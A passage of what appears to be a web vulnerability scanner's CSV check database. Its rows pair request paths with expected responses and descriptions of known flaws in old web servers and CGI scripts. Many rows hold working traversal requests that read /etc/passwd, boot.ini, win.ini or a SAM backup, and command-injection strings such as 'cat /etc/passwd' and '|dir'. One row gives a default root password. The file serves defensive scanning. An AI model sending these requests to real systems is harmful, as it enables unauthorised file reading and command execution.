to retrieve directory listings.","","" "000423","","3","/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000424","CVE-2002-0407","3","@CGIDIRScom5..........................................................................................................................................................................................................................box","GET","Execution of Perl script","","","","","Lotus reveals file system paths when requesting DOS devices with bad syntax.","","" "000425","CVE-2002-0407","3","@CGIDIRScom5.java","GET","Execution of","","","","","Lotus reveals file system paths when requesting DOS devices with bad syntax.","","" "000426","CVE-2002-0407","3","@CGIDIRScom5.pl","GET","Execution of Perl script","","","","","Lotus reveals file system paths when requesting DOS devices with bad syntax.","","" "000428","https://securiteam.com/securitynews/6W0030U35W/","3","/?OpenServer","GET","\\\/icons\\\/abook\\\.gif","","","","","This install allows remote users to enumerate DB names.","","" "000431","CVE-2000-0021","3","/cgi-bin/testing_whatever","GET","domino\/cgi-bin","","","","","The Domino server reveals the system path to the cgi-bin directory by requesting a bogus CGI.","","" "000436","","3","/LOGIN.PWD","GET","200","","","","","MIPCD password file with unencrypted passwords. MIPDCD should not have the web interface enabled.","","" "000437","","3","/USER/CONFIG.AP","GET","200","","","","","MIPCD configuration information. MIPCD should not have the web interface enabled.","","" "000438","","3","@CGIDIRSmail","GET","200","","","","","Simple Perl mailing script to send form data to a pre-configured email address","","" "000439","","3","@CGIDIRSnph-error.pl","GET","200","","","","","Gives more information in error messages","","" "000440","","3","@CGIDIRSpost-query","POST","MYDATA","","","","","Echoes back result of your POST","MYDATA","" "000441","","3","@CGIDIRSquery","GET","200","","","","","Echoes back result of your GET","","" "000442","","3","@CGIDIRStest-cgi.tcl","GET","200","","","","","May echo environment variables or give directory listings","","" "000443","","3","@CGIDIRStest-env","GET","200","","","","","May echo environment variables or give directory listings","","" "000444","http://www.securityspace.com/smysecure/catid.html?id=1.3.6.1.4.1.25623.1.0.11220","3","/.perf","GET","ListenSocket","","","","","Contains Netscape/iPlanet server performance information","","" "000445","CVE-1999-0239","3","/","get","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Fasttrack can give a directory listing if issued 'get' instead of 'GET'","","" "000446","","3","/","INDEX","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Netscape web publisher can give directory listings with the INDEX tag. Disable INDEX or Web Publisher.","","" "000447","","3","//","GET","Proxy autoconfig","","","","","Proxy auto configuration file retrieved.","","" "000448","","3","/admin-serv/config/admpw","GET","200","","","","","This file contains the encrypted Netscape admin password. It should not be accessible via the web.","","" "000449","https://vulners.com/osvdb/OSVDB:39140","3","/test.php%20","GET","<\?php","","","","","The OmniHTTP install may allow php/shtml/pl script disclosure. Upgrade to the latest version.","","" "000450","","3","/*.*","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","WASD Server reveals the contents of directories via this URL. Upgrade to a later version and secure according to the documents on the WASD web site.","","" "000451","","3","/cgi-bin/cgi_process","GET","200","","","","","WASD reveals a lot of system information in this script. It should be removed.","","" "000452","","3","/ht_root/wwwroot/-/local/httpd$map.conf","GET","200","","","","","WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.","","" "000453","","3","/JUNK(10)","GET","Document not found \.\.\. \/","","","","","WASD reveals the web root in error requests. Upgrade to a later version and secure according to the documents on the WASD web site.","","" "000454","","3","/local/httpd$map.conf","GET","200","","","","","WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.","","" "000455","","3","/tree","GET","200","","","","","WASD Server reveals the entire web root structure and files via this URL. Upgrade to a later version and secure according to the documents on the WASD web site.","","" "000456","","3","@CGIDIRSindex.js0x70","GET","\\<\\\%\\=","","","","","Weblogic can be tricked into revealing JSP source by adding '0x70' to end of the URL.","","" "000457","https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513","3","/%00/","GET","<\%","","","","","Weblogic allows directory listings with %00 (or indexing is enabled), upgrade to v6.0 SP1 or higher.","","" "000458","https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513","3","/%00/","GET","directory listing of","","","","","Weblogic allows directory listings with %00 (or indexing is enabled), upgrade to v6.0 SP1 or higher.","","" "000459","https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513","3","/%00/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Weblogic allows directory listings with %00 (or indexing is enabled), upgrade to v6.0 SP1 or higher. BID-2513","","" "000460","https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513","3","/%2e/","GET","<\%","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513","","" "000461","https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513","3","/%2e/","GET","directory listing of","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher.","","" "000462","https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513","3","/%2e/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher.","","" "000463","https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513","3","/%2f/","GET","<\%","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513","","" "000464","https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513","3","/%2f/","GET","directory listing of","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher.","","" "000465","https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513","3","/%2f/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher.","","" "000466","https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513","3","/%5c/","GET","<\%","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513","","" "000467","https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513","3","/%5c/","GET","directory listing of","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher.","","" "000468","https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513","3","/%5c/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher.","","" "000469","https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513","3","/index.jsp%00x","GET","<\%=","","","","","Bea WebLogic 6.1 SP 2 discloses source by appending %00x to a JSP request. Upgrade to a version newer than 6.2 SP 2 for Win2k.","","" "000470","","2","/weblogic","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "000471","","3","/%a%s%p%d","GET","\*s\?d","","","","","Format bug is present & may reveal system path, upgrade to the latest version.","","" "000472","","3","/index.html%20","GET","File for URL","","","","","Website may reveal file system paths by adding %20 to the end of a legitimate .html request.","","" "000476","CVE-2001-0821 https://packetstormsecurity.com/files/32406/xmas.txt.html","23","@CGIDIRSorders/orders.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely.","","" "000480","","3d","@CGIDIRScgitest.exe","GET","200","","","","","This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.","","" "000481","","6","/examples/servlet/AUX","GET","200","","","","","Apache Tomcat versions below 4.1 may be vulnerable to DoS by repeatedly requesting this file.","","" "000482","CVE-2003-0169","6","@CGIDIRShpnst.exe?c=p+i=SrvSystemInfo.html","GET","200","","","","","HP Instant TopTools may be vulnerable to a DoS by requesting hpnst.exe?c=p+i=hpnst.exe multiple times.","","" "000483","","6","/cfdocs/cfmlsyntaxcheck.cfm","GET","200","","not found","","","Can be used for a DoS on the server by requesting it check all .exe's","","" "000484","https://raw.githubusercontent.com/sullo/advisory-archives/master/phenoelit.de_dp-300.txt","6","/Config1.htm","GET","200","","","","","This may be a D-Link. Some devices have a DoS condition if an oversized POST request is sent. This DoS was not tested.","","" "000485","MS02-018","6","/contents/extensions/asp/1","GET","200","","","","","The IIS system may be vulnerable to a DOS.","","" "000486","CVE-2005-1247","6","/WebAdmin.dll?View=Logon","GET","200","","","","","Some versions of WebAdmin are vulnerable to a remote DoS (not tested).","","" "000487","CVE-2002-0128","6","@CGIDIRSPbcgi.exe?bcgiu4","GET","200","","","","","Sambar may be vulnerable to a DOS when a long string is passed to Pbcgi.exe (not attempted). Default CGI should be removed from web servers.","","" "000488","CVE-2002-0128","6","@CGIDIRStestcgi.exe","GET","200","","","","","Sambar may be vulnerable to a DOS when a long string is passed to testcgi.exe (not attempted). Default CGI should be removed from web servers.","","" "000489","CVE-2002-0128","6","/cgi-win/cgitest.exe","GET","200","","","","","This CGI may allow the server to be crashed remotely.","","" "000490","","7","/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd","GET","root:","","","","","The Web_Server_4D is vulnerable to a directory traversal problem.","","" "000491","","8","/c/winnt/system32/cmd.exe?/c+dir+/OG","GET","Directory of c","","","","","This machine is infected with Code Red, or has Code Red leftovers.","","" "000492","","8","@CGIDIRSsnorkerz.bat","GET","200","","","","","Arguments passed to DOS CGI without checking","","" "000493","","8","@CGIDIRSsnorkerz.cmd","GET","200","","","","","Arguments passed to DOS CGI without checking","","" "000494","","8","/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c","GET","\[winnt\]","","","Internal server error","","Can issue arbitrary commands to host.","","" "000495","","8","/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c","GET","The parameter is incorrect","","","Internal server error","","May be able to issue arbitrary commands to host.","","" "000496","http://attrition.org/security/advisory/individual/rfp/rfp.9901.nt_odbc","8","/msadc/samples/adctest.asp","GET","Remote Data Service","","","","","The IIS sample application adctest.asp may be used to remotely execute commands on the server.","","" "000497","","b","/JUNK(10)","GET","SecureIIS application","","","","","Server appears to be running eEye's SecureIIS application, http://www.eeye.com/.","","" "000498","","b","/somethingnotthere.ida","GET","Rejected-By-UrlScan","","","","","The IIS server is running UrlScan","","" "000501","","d","/cgi-shl/win-c-sample.exe","GET","200","","","","","win-c-sample.exe has a buffer overflow","","" "000502","CVE-2002-2006","34","/examples/servlet/TroubleShooter","GET","TroubleShooter Servlet Output","","","","","Tomcat default JSP page reveals system information and may be vulnerable to XSS.","","" "000503","CVE-2002-0307","8","@CGIDIRSans.pl?p=../../../../../usr/bin/id|&blah","GET","uid=","","","","","Avenger's News System allows commands to be issued remotely.","","" "000504","CVE-2002-0307","8","@CGIDIRSans/ans.pl?p=../../../../../usr/bin/id|&blah","GET","uid=","","","","","Avenger's News System allows commands to be issued remotely.","","" "000505","","2","/goform/CheckLogin?login=root&password=tslinux","GET","MainPageTable","","","","","The Cyclades' web user 'root' still has the default password 'tslinux' set. This should be changed immediately. Also, the id/password is hashed to create the sessionId cookie, which is bad.","","" "000506","https://securiteam.com/exploits/5HP0M2A60G","5","/[SecCheck]/..%2f../ext.ini","GET","\[SERVICES\]","","","","","BadBlue server is vulnerable to multiple remote exploits.","","" "000507","https://securiteam.com/exploits/5HP0M2A60G","5","/[SecCheck]/..%255c..%255c../ext.ini","GET","\[SERVICES\]","","","","","BadBlue server is vulnerable to multiple remote exploits.","","" "000508","https://securiteam.com/exploits/5HP0M2A60G","5","/[SecCheck]/..%252f..%252f../ext.ini","GET","\[SERVICES\]","","","","","BadBlue server is vulnerable to multiple remote exploits.","","" "000509","","5","/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini","GET","\[fonts\]","","","","","The ColdFusion install allows attackers to read arbitrary files remotely","","" "000510","","5","/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini","GET","\[fonts\]","","","","","The ColdFusion install allows attackers to read arbitrary files remotely","","" "000511","","5","/.nsf/../winnt/win.ini","GET","200","","","","","This win.ini file can be downloaded.","","" "000512","MS01-033","5","/prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server.","","" "000513","MS01-033","5","/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server.","","" "000514","MS01-033","5","/iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server.","","" "000515","MS01-033","5","/iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server.","","" "000516","CVE-2000-0097","5","/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20","GET","\[fonts\]","","","","","Server may be vulnerable to a Webhits.dll arbitrary file retrieval. Ensure Q252463i, Q252463a or Q251170 is installed. MS00-006.","","" "000517","CVE-2000-0097","5","/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20","GET","\[windows\]","","","","","Server may be vulnerable to a Webhits.dll arbitrary file retrieval. Ensure Q252463i, Q252463a or Q251170 is installed. MS00-006.","","" "000518","","5","/................../config.sys","GET","200","","","","","PWS allows files to be read by prepending multiple '.' characters. At worst, IIS, not PWS, should be used.","","" "000519","","5","/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini","GET","boot loader","","","","","Allows an attacker to view arbitrary files","","" "000520","","5","/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini","GET","boot loader","","","","","Allows an attacker to view arbitrary files","","" "000521","","5","/cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini","GET","boot loader","","","","","Allows an attacker to view arbitrary files.","","" "000522","CVE-2002-0262","5","/netget?sid=user&msg=300&file=../../../../../../../../../boot.ini","GET","boot loader","","","","","Sybex E-Trainer allows arbitrary files to be retrieved.","","" "000523","CVE-2002-0262","5","/netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd","GET","root:","","","","","Sybex E-Trainer allows arbitrary files to be retrieved.","","" "000524","","5","/php/php.exe?c:\winnt\boot.ini","GET","boot loader","","","","","Apache/PHP installations can be misconfigured (according to documentation) to allow files to be retrieved remotely.","","" "000525","https://www.exploit-db.com/exploits/22336","5","/phpping/index.php?pingto=www.test.com%20|%20dir%20c:\\","GET","boot\.ini","","","","","PHP Ping allows commands to be executed on the remote host.","","" "000526","CVE-2002-1483","5","/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini","GET","boot loader","","","","","The boot.ini file was retrieved by using the db4web executable.","","" "000527","","5","/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini","GET","boot loader","","","","","Default scripts can allow arbitrary access to the host.","","" "000528","CVE-2003-1345","5","/wx/s.dll?d=/boot.ini","GET","boot loader","","","","","WebCollection Plus allows any file to be retrieved from the remote system.","","" "000529","","5","@CGIDIRSAlbum?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0","GET","resolv\.conf","","","","","This CGI allows attackers to view arbitrary files on the host.","","" "000530","","5","/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini","GET","boot loader","","","","","The Web_Server_4D is vulnerable to a directory traversal problem.","","" "000531","CVE-2001-1458","5","/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00","GET","\[boot loader\]","","","","","The Novell Groupwise WebAcc Servlet allows attackers to view arbitrary files on the server.","","" "000532","CVE-2002-0466","5","@CGIDIRSSQLServ/sqlbrowse.asp?filepath=c:\&Opt=3","GET","boot\.ini","","","","","Hosting Controller versions 1.4.1 and lower can allow arbitrary files/directories to be read. Upgrade.","","" "000533","CVE-2002-0466","5","@CGIDIRSstats/statsbrowse.asp?filepath=c:\&Opt=3","GET","boot\.ini","","","","","Hosting Controller versions 1.4.1 and lower can allow arbitrary files/directories to be read. Upgrade.","","" "000534","","5","@CGIDIRStest.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\","GET","boot\.ini","","","","","This CGI allows attackers to read files from the server.","","" "000535","","5","@CGIDIRStst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,","GET","boot\.ini","","","","","This CGI allows attackers to execute arbitrary commands on the server.","","" "000536","","5","@CGIDIRSinput.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\","GET","boot\.ini","","","","","This CGI allows attackers to read files from the server.","","" "000537","","5","@CGIDIRSinput2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\","GET","boot\.ini","","","","","This CGI allows attackers to read files from the server.","","" "000538","","5","/ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\","GET","boot\.ini","","","","","This CGI allows attackers to read files from the server.","","" "000539","","5","/php/php.exe?c:\boot.ini","GET","boot loader","","","","","The Apache config allows php.exe to be called directly.","","" "000540","","5","/../../../../../../../../../boot.ini","GET","boot loader","","","","","The remote server allows any system file to be retrieved remotely.","","" "000541","","5","/../../../../winnt/repair/sam._","GET","200","","","Forbidden","","Sam backup successfully retrieved.","","" "000542","","5","/..\\..\\..\\..\\..\\..\\..\\boot.ini","GET","boot loader","","","","","It is possible to read files on the server by adding /../ in front of file name.","","" "000543","","5","///etc/passwd","GET","root:","","","","","The server install allows reading of any system file by adding an extra '/' to the URL.","","" "000544","","5","///etc/hosts","GET","127\.0\.0\.1","","","","","The server install allows reading of any system file by adding an extra '/' to the URL.","","" "000545","CVE-2002-0784","5","////./../.../boot.ini","GET","boot loader","","","","","Server is vulnerable to directory traversal, this may be Lidik Webserver 0.7b from lysias.de.","","" "000546","CVE-2000-0234","5","/.cobalt/sysManage/../admin/.htaccess","GET","AuthName","","","","","Cobalt RaQ 4 server manager allows any files to be retrieved by using the path through the .cobalt directory.","","" "000547","","5","/albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd","GET","root:","","","","","Coppermine 1.0 RC3 may have been compromised to allow arbitrary file retrieval. The product is no longer maintained and should be replaced.","","" "000548","CVE-2003-0294","5","/autohtml.php?op=modload&mainfile=x&name=/etc/passwd","GET","root:","","","","","php-proxima 6.0 and below allows arbitrary files to be retrieved.","","" "000549","OSVDB-49354","5","/atomicboard/index.php?location=../../../../../../../../../../etc/passwd","GET","root:","","","","","AtomicBoard v0.6.2 allows remote users to read arbitrary files.","","" "000550","OSVDB-54099","5","/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1","GET","root:","","","","","w-agora 4.1.5 allows any file to be retrieved from the remote host.","","" "000551","BID-6595,https://vulners.com/osvdb/OSVDB:3012","5","/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","w-agora 4.1.5 allows any file to be retrieved from the remote host.","","" "000552","https://seclists.org/bugtraq/2003/Feb/382","5","@TYPO3typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00","GET","root:","","","","","TYPO3 allows any file to be retrieved remotely. Upgrade to the latest version.","","" "000553","","5","/DomainFiles/*//../../../../../../../../../../etc/passwd","GET","root:","","","","","Communigate Pro 4.0b to 4.0.2 allow any file to be retrieved from the remote system.","","" "000554","CVE-2002-0879","5","/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini","GET","boot loader","","","","","Gafware's CFXImage allows remote users to view any file on the system.","","" "000555","OSVDB-59600","5","/ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1","GET","root:","","","","","eZ httpbench version 1.1 allows any file on the remote server to be retrieved.","","" "000556","https://vulners.com/osvdb/OSVDB:2870","5","/index.php?download=/winnt/win.ini","GET","\[fonts\]","","","","","Snif 1.2.4 allows any file to be retrieved from the web server.","","" "000557","https://vulners.com/osvdb/OSVDB:2870","5","/index.php?download=/windows/win.ini","GET","\[windows\]","","","","","Snif 1.2.4 allows any file to be retrieved from the web server.","","" "000558","https://vulners.com/osvdb/OSVDB:2870","5","/index.php?download=/etc/passwd","GET","root:","","","","","Snif 1.2.4 allows any file to be retrieved from the web server.","","" "000559","OSVDB-59085","5","/index.php?|=../../../../../../../../../etc/passwd","GET","root:","","","","","Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.","","" "000560","","5","/index.php?page=../../../../../../../../../../etc/passwd","GET","root:","","","","","The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)","","" "000561","","5","/index.php?page=../../../../../../../../../../boot.ini","GET","boot loader","","","","","The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)","","" "000562","OSVDB-59085","5","/index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd","GET","root:","","","","","Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.","","" "000563","","5","/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd","GET","root:","","","","","Default JRun CGI lets users read any system file.","","" "000564","","5","/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini","GET","boot loader","","","","","Default JRun CGI lets users read any system file.","","" "000565","OSVDB-51750","5","/k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor","GET","root:","","","","","Kebi Academy 2001 Web Solution allows any file to be retrieved from the remote system.","","" "000566","","5","/nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0","GET","root:","","","","","nCUBE Server Manage 1.0 allows any file to be read on the remote system.","","" "000567","","5","/nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0","GET","passwd","","","","","nCUBE Server Manage 1.0 allows directory listings of any location on the remote system.","","" "000568","","5","/phprocketaddin/?page=../../../../../../../../../../boot.ini","GET","boot loader","","","","","The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host.","","" "000569","OSVDB-2829","5","/phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd","GET","root:","","","","","phpWebFileManager v2.0.0 and prior are vulnerable to a directory traversal bug.","","" "000570","OSVDB-2829","5","/phpwebfilemgr/index.php?f=../../../../../../../../../etc","GET","passwd","","","","","phpWebFileManager v2.0.0 and prior are vulnerable to a directory traversal bug.","","" "000571","","5","/phptonuke.php?filnavn=/etc/passwd","GET","root:","","","","","Photonouke or myphpnuke allows arbitrary files to be retrieved from the remote host.","","" "000572","","5","/put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd","GET","root:","","","","","NCR's Terradata server contains a CGI that allows any file to be retrieved remotely.","","" "000573","CVE-2001-0215","5","/ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","The ROADS search.pl allows attackers to retrieve system files.","","" "000574","","5","/support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read files on the host.","","" "000575","","5","/viewpage.php?file=/etc/passwd","GET","root:","","","","","PHP-Nuke script viewpage.php allows any file to be retrieved from the remote system.","","" "000576","CVE-2000-1005","5","/Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html","GET","root:","","","","","eXtropia's Web Store lets attackers read any file on the system by appending a %00.html to the name.","","" "000577","CVE-2002-0926 http://www.wolfram.com","5","/webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif","GET","boot loader","","","","","Wolfram Research's webMathematica allows any file to be read on the remote system. Upgrade to the latest version.","","" "000578","CVE-2002-0926 http://www.wolfram.com","5","/webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif","GET","root:","","","","","Wolfram Research's webMathematica allows any file to be read on the remote system. Upgrade to the latest version.","","" "000579","CVE-2002-0277","5","@CGIDIRSadmin.cgi?list=../../../../../../../../../../etc/passwd","GET","root:","","","","","Add2it Mailman Free V1.73 allows arbitrary files to be retrieved.","","" "000580","","5","@CGIDIRS14all.cgi?cfg=../../../../../../../../etc/passwd","GET","root:","","","","","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.","","" "000581","","5","@CGIDIRS14all-1.1.cgi?cfg=../../../../../../../../etc/passwd","GET","root:","","","","","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.","","" "000582","CVE-2001-0593","5","@CGIDIRSanacondaclip.pl?template=../../../../../../../../../../etc/passwd","GET","root:","","","","","This allows attackers to read arbitrary files from the server.","","" "000583","","5","@CGIDIRSauktion.cgi?menue=../../../../../../../../../../etc/passwd","GET","root:","","","","","The CGI allows attackers to read arbitrary files remotely.","","" "000584","","5","@CGIDIRSbigconf.cgi?command=view_textfile&file=/etc/passwd&filters=","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the host.","","" "000585","","5","@CGIDIRSbb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd","GET","root:","","","","","Versions of BigBrother 1.4h or older allow attackers to read arbitrary files on the system.","","" "000586","","5","@CGIDIRSbb-hist?HISTFILE=../../../../../../../../../../etc/passwd","GET","root:","","","","","Versions 1.09b or1.09c of BigBrother allow attackers to read arbitrary files.","","" "000587","","5","@CGIDIRSbb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd","GET","root:","","","","","Versions 1.09b or1.09c of BigBrother allow attackers to read arbitrary files.","","" "000588","","5","@CGIDIRScommon.php?f=0&ForumLang=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read files on the host.","","" "000589","","5","@CGIDIRScommerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the server.","","" "000590","","5","@CGIDIRScgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the server.","","" "000591","","5","@CGIDIRScal_make.pl?p0=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the host.","","" "000592","","5","@CGIDIRSdb4web_c/dbdirname//etc/passwd","GET","root:","","","","","The passwd file was retrieved by using the db4web executable.","","" "000593","CVE-2001-0780","5","@CGIDIRSdirectorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the server.","","" "000594","CVE-2002-0531","5","@CGIDIRSemumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","","" "000595","CVE-2002-0531","5","@CGIDIRSemumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","","" "000596","CVE-2002-0531","5","@CGIDIRSemu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","","" "000597","","5","@CGIDIRSfaxsurvey?cat%20/etc/passwd","GET","root:","","","","","This CGI allows attackers to execute commands and read files remotely.","","" "000598","CVE-2002-2033","5","@CGIDIRSfaqmanager.cgi?toc=/etc/passwd%00","GET","root:","","","","","FAQmanager allows arbitrary files to be read on the host. Upgrade to latest version.","","" "000599","CVE-2000-0188","5","@CGIDIRSezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1","GET","root:","","","","","EZShopper search CGI allows arbitrary files to be read","","" "000600","","5","@CGIDIRSformmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test","GET","root:","","","","","This CGI allows attackers to retrieve arbitrary files from the server.","","" "000601","","5","@CGIDIRSformmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test","GET","root:","","","","","This CGI allows attackers to retrieve arbitrary files from the server.","","" "000602","CVE-2001-1115","5","@CGIDIRSgenerate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1","GET","\[fonts\]","","","","","This CGI from SIX webboard allows attackers read arbitrary files on the host.","","" "000603","CVE-2001-1115","5","@CGIDIRSgenerate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1","GET","\[windows\]","","","","","This CGI from SIX webboard allows attackers read arbitrary files on the host.","","" "000604","CVE-2001-1115","5","@CGIDIRSgenerate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1","GET","root:","","","","","This CGI from SIX webboard allows attackers read arbitrary files on the host.","","" "000605","","5","@CGIDIRShtmlscript?../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","","" "000606","","5","@CGIDIRShtgrep?file=index.html&hdr=/etc/passwd","GET","root:","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","","" 